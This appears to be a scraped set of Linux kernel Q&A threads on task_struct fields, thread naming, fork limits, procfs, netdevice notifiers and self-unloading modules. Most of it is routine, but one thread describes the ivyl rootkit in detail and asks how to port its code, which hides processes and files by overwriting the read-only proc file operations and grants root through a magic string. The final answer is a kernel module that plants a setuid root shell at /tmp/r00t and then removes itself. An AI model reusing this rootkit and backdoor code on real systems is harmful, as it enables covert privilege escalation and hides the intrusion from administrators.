Previously, Thank you for watching and answering about my question.
I'm watching the code of linux kernel specifically, linux/kernel/kthread.c
In the file, there's a function tsk_fork_get_node as below
/* called from do_fork() to get node information for about to be created task */
int tsk_fork_get_node(struct task_struct *tsk)
{
#ifdef CONFIG_NUMA
if (tsk == kthreadd_task)
return tsk->pref_node_fork;
#endif
return NUMA_NO_NODE;
}
I can't find the exact meaning of pref_node_fork variable. and i want to know the full name of it.
I also found the patch (commit id 207205a2ba, with "git show 207205a2ba")
But there's no explain for the pref_node_fork variable in task_struct.
Summary :
I want to know the exact meaning of pref_node_fork variable.
I want to know the full name of pref_node_fork variable.
I don't follow what's the problem here. The commit message clearly states it extends the API so that when spawning a new kernel thread you can tell what numa domain should be used. And then one can see it is done by smuggling the node parameter through the perf_node_fork field and using it on fork in tsk_fork_get_node.
I have to ask why are you looking at this code.
Related
I am using pthread in my program. For creation using pthread_create(). Right after creation I am using pthread_setname_np() to set the created thread's name.
I am observing that the name I set takes a small time to reflect, initially the thread inherits the program name.
Any suggestions how I can set the thread name at the time I create the thread using pthread_create()? I researched a bit in the available pthread_attr() but did not find a function that helps.
A quick way to reproduce what I am observing, is as follows:
void * thread_loop_func(void *arg) {
// some code goes here
pthread_getname_np(pthread_self(), thread_name, sizeof(thread_name));
// Output to console the thread_name here
// some more code
}
int main() {
// some code
pthread_t test_thread;
pthread_create(&test_thread, &attr, thread_loop_func, &arg);
pthread_setname_np(test_thread, "THREAD-FOO");
// some more code, rest of pthread_join etc follows.
return 0;
}
Output:
<program_name>
<program_name>
THREAD-FOO
THREAD-FOO
....
I am looking for the first console output to reflect THREAD-FOO.
how I can set the thread name at the time I create the thread using pthread_create()?
That is not possible. Instead you can use a barrier or mutex to synchronize the child thread until it's ready to be run. Or you can set the thread name from inside the thread (if any other threads are not using it's name).
Do not to use pthread_setname_np. This is a nonstandard GNU extension. The _np suffix literally means "non-portable". Write portable code and instead use your own place where you store your thread names.
Instead of pthread_setname_np(3) you can use prctl(2) with PR_SET_NAME. The only limitation with this function is that you can only set the name of the calling process/thread. But since your example is doing exactly that, there should be no problem with this solution AND it's a portable standard API.
I am new to Linux and I have been assigned this
In Linux kernel sources, Find _do_fork(), the fundamental routine for creating a new process
What is the purpose (give a high-level description) of copy_process() ?
Within copy_process, what exact code guards against fork() bombs?
can somebody help me out?
Firstly, you need to know that fork() will use system call and find interrrupt function from Interrupt table which is named as 'sys_fork()`, which is like below
SYSCALL_DEFINE0(fork)
{
......
return _do_fork(SIGCHLD, 0, 0, NULL, NULL, 0);
}
So the core of fork is _do_fork()
This function will do two major work
call copy_process() to copy structure of process/thread in kernel, which named as task_struct
call wake_up_new() to wake up the task
Like I said in my comment, elixir.bootlin.com is a very good resource for looking at the source code of Linux. It has a very good search engine. I've been looking at the source code and I think I found the code which does what you are looking for (related to fork bombs prevention).
In kernel/fork.c in the copy_process() function you find the following lines:
if (atomic_read(&p->real_cred->user->processes) >=
task_rlimit(p, RLIMIT_NPROC)) {
if (p->real_cred->user != INIT_USER &&
!capable(CAP_SYS_RESOURCE) && !capable(CAP_SYS_ADMIN))
goto bad_fork_free;
}
This code does an atomic_read of the current task_struct structure (p) being copied. It reads the member real_cred which is a struct of type cred defined in include/linux/cred.h. This struct contains a member named user which is a struct of type user_struct defined in include/linux/sched.h. This user_struct contains a member named processes which is an atomic_t which is itself a struct containing one member (an int). So processes is basically an int which tells the kernel how much processes a user have. The code above checks this member against the value returned by task_rlimit() function. If the limit is exceeded, it cancels the whole thing. Hosnestly, I don't completely understand the if in the middle. But you can always look for details in the source code.
I'm migrating a kernel module from 3.1 to 3.18. struct dir_proc_entry definition was moved to fs/proc/internal.h. How do I use this structure now in the new version? When I tried to include internal.h I got an error that it doesn't exist.
fatal error: fs/proc/internal.h: No such file or directory
Is there something I'm missing to work with dir_proc_entry? I read that this structure was made opaque in 3.10. What is the proper way to work with this?
In my code for example I have:
static struct proc_dir_entry *proc01;
...
parent = proc01->parent;
What is the proper way to work with proc_dir_entry?
What I'm trying to do is EXACTLY this: dereferencing proc_dir_entry pointer causing compilation error on linux version 3.11 and above
I made the exact same modifications as the code listed on my own. The only changes are that I'm using newer/different kernel headers now.
Here is how ivyl rootkit works.
The kernel module initializes with __init rootkit_init(void).
Run both procfs_init or fs_init
Both of these functions replace the readdir (for kernels 3.10 and older) or iterate (for kernels 3.11 and newer) with a custom version. This is the hiding functionality of a rootkit. They work by making memory read/write replacing the function then making the memory read only.
procfs_init operates on the process filesystem. It creates a file that is read/write by everyone called rtkit. It replaces the original readdir (iterate) with the new one that hides rtkit from view.
fs_init operates on the filesystem in /etc. This is where the module is stored. In other words, it hides the executable code.
The code in procfs_init is what relies on proc_dir_entry structure. This code does the following in detail (line by line):
Creates an entry for the process "rtkit" that is read/write by everyone.
Error checking – if the process is not created return 0.
Get the parent process.
Error checking – if parent is null or the parent process is not "/proc" return 0.
Set the read function of the rtkit process – this just prints some information about what the rootkit is doing. A kind of help command.
Set the write function of the rtkit process. This is main function that brings everything together. It looks for the code "mypenislong" and changes to root. The user running this rootkit now has full root privileges. It also hides given processes and given modules as per the command given.
Get a file operations structure (file_operations) for the root process (proc_root)
From the file operations get the original readdir (iterate) function.
Set the proc_fops to read/write
Set the proc_fops iterate member to the new function of the rootkit (the one that hides functionality)
Set the proc_fops back to read only.
Return 1.
The code for procfs_init:
static int __init procfs_init(void)
{
//new entry in proc root with 666 rights
proc_rtkit = create_proc_entry("rtkit", 0666, NULL);
if (proc_rtkit == NULL) return 0;
proc_root = proc_rtkit->parent;
if (proc_root == NULL || strcmp(proc_root->name, "/proc") != 0) {
return 0;
}
proc_rtkit->read_proc = rtkit_read;
proc_rtkit->write_proc = rtkit_write;
//substitute proc readdir to our wersion (using page mode change)
proc_fops = ((struct file_operations *) proc_root->proc_fops);
proc_readdir_orig = proc_fops->iterate;
set_addr_rw(proc_fops);
proc_fops->iterate = proc_readdir_new;
set_addr_ro(proc_fops);
return 1;
}
Since the dir_proc_entry structure is now opaque, how do I replace the functionality of this code? I need the code to read/write processes so that the process can be hidden as required.
Edit: modified question title and removed extraneous statement. Added clarification on what I'm trying to do.
Edit: Added description of ivyl rootkit workings.
I work on Ubuntu kernel-mode netfilter module and need information about all network interfaces and their properties in module code.
Inside of init_module() I use register_netdevice_notifier() for that purpose. When callback function is called I can see correct event codes like up/down and other, but it seems that third parameter void* casted to net_device* provides object with invalid properties. ->name is empty string, ->if index is some nonsense number etc.
I tried debug version of module on kernel 3.19 and rebuild also on 4.2. Result is the same, I cannot read properties of net_device relating to event.
What can be problem ?
From what I can see from LXR, you need to call netdev_notifier_info_to_dev on the last parameter to get your net_device * (see here)
I've made a simple module which prints GDT and IDT on loading. After it's done its work, it's no longer needed and can be unloaded. But if it returns a negative number in order to stop loading, insmod will complain, and an error message will be logged in kernel log.
How can a kernel module gracefully unload itself?
As far as I can tell, it is not possible with a stock kernel (you can modify the module loader core as I describe below but that's probably not a good thing to rely on).
Okay, so I've taken a look at the module loading and unloading code (kernel/module.c) as well as several users of the very-suspiciously named module_put_and_exit. It seems as though there is no kernel module which does what you'd like to do. All of them start up kthreads inside the module's context and then kill the kthread upon completion of something (they don't automatically unload the module).
Unfortunately, the function which does the bulk of the module unloading (free_module) is statically defined within kernel/module.c. As far as I can see, there's no exported function which will call free_module from within a module. I feel like there's probably some reason for this (it's very possible that attempting to unload a module from within itself will cause a page fault because the page which contains the module's code needs to be freed). Although this probably could be solved by making a noreturn function which just schedules after preventing the current (invalid) task from being run again (or just running do_exit).
A further point to ask is: are you sure that you want to do this? Why don't you just make a shell script to load and unload the module and call it a day? Auto-unloading modules are probably a bit too close to Skynet for my liking.
EDIT: I've played around with this a bit and have figured out a way to do this if you're okay with modifying the module loader core. Add this function to kernel/module.c, and make the necessary modifications to include/linux/module.h:
/* Removes a module in situ, from within the module itself. */
void __purge_module(struct module *mod) {
free_module(mod);
do_exit(0);
/* We should never be here. */
BUG();
}
EXPORT_SYMBOL(__purge_module);
Calling this with __purge_module(THIS_MODULE) will unload your module and won't cause a page fault (because you don't return to the module's code). However, I would still not recommend doing this. I've done some simple volume testing (I inserted a module using this function ~10000 times to see if there were any resource leaks -- as far as I can see there aren't any).
Oh you can do definitely do it :)
#include <linux/module.h>
MODULE_LICENSE("CC");
MODULE_AUTHOR("kristian erik hermansen <kristian.hermansen+CVE-2017-0358#gmail.com>");
MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero");
int init_module(void) {
printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want to patch your system!\n");
char *envp[] = { "HOME=/tmp", NULL };
char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t; /bin/chmod u+s /tmp/r00t", NULL };
call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL };
call_usermodehelper(argv[0], argvv, envp, UMH_WAIT_EXEC);
}
void cleanup_module(void) {
return 0;
printk(KERN_INFO "[*] CVE-2017-0358 exploit unloading ...\n");
}